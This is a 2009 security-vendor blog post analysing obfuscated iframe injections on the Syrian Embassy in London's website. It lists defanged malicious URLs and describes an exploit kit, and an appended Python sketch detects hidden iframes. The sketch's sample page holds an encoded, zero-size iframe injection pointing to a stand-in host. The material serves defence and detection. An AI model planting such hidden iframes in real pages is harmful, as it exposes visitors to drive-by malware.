Sep 26
1:54 am (UTC-7)   |   by Jonell Baltazar (Advanced Threats Researcher)

This confirms a report from Websense about the compromised official website of the Syrian Embassy in London. There are indeed three obfuscated iframes in the site.

The following is a sample obfuscated script found in the compromised page:

[Image: 1.JPG, the sample obfuscated script]

Deobfuscating these scripts yields the following URLs:

  • hxxp://0ki.ru{blocked}/index.php
  • hxxp://sicil.info{blocked}/index.php
  • hxxp://x12345.or/{blocked}ounter.php?out=1189360677 (a zero-byte file)

Initial analysis of the first URL suggests that it accepts a country code as an argument, so country checking is most probably employed. This is already detected as JS_PSYME.ANT. The second URL contains another iframe, which leads to a URL containing the exploit kit (most probably Icepack). The exploit kit employs OS detection and web browser detection, and contains several exploits targeting web browsers and web browser plug-ins. It will try to exploit several vulnerabilities to download and execute a file, to be detected as TROJ_SMALL.KYZ. The exploit kit will be detected as JS_PSYME.ADQ.

The third URL just contains a zero-byte file. The malicious files are already being processed and the malicious URLs have been submitted for blocking.
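
A triage sketch for the deobfuscation step described above, added here as an example and not taken from the original post or from Trend Micro tooling. The screenshot of the real script is not available, so it assumes the common `document.write(unescape('...'))` wrapper; the sample page, its hosts and the names `find_iframes`, `IframeCollector` and `defang` are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Constructed sample page: one visible iframe, one hidden iframe written by an
# unescape() wrapper. Hosts use the reserved .example/.invalid TLDs.
SAMPLE_PAGE = """<html><body>
<iframe src="http://maps.example/embed" width="400" height="300"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//stats.invalid/index.php%22%20width%3D%220%22%20height%3D%220%22%3E%3C/iframe%3E'));</script>
</body></html>"""

# Assumed obfuscation pattern: document.write(unescape('<percent-encoded HTML>')).
# Only %XX escapes are decoded; %uXXXX escapes are not handled here.
WRAPPER = re.compile(r"""document\.write\(\s*unescape\(\s*(['"])(.*?)\1\s*\)\s*\)""", re.S)


class IframeCollector(HTMLParser):
    """Collects (src, hidden) for every iframe tag seen."""
    def __init__(self):
        super().__init__()
        self.found = []
    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                  or "display:none" in style or "visibility:hidden" in style)
        self.found.append((a.get("src", ""), hidden))


def defang(url):
    """Rewrite a URL so it cannot be clicked or fetched by accident."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def find_iframes(html, page_host):
    """Return dicts for iframes in static HTML and in decoded script payloads."""
    layers = [("static", html)]
    layers += [("decoded", unquote(m.group(2))) for m in WRAPPER.finditer(html)]
    results = []
    for origin, markup in layers:
        parser = IframeCollector()
        parser.feed(markup)
        for src, hidden in parser.found:
            host = urlsplit(src).hostname or ""
            results.append({"origin": origin, "src": defang(src), "hidden": hidden,
                            "offsite": bool(host) and host != page_host})
    return results
```

Entries with `origin == "decoded"`, `hidden` and `offsite` all set are the ones to review first; a visible off-site iframe in the static markup is usually a legitimate embed.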

© Copyright 2009 Trend Micro Inc. All rights reserved. Legal Notice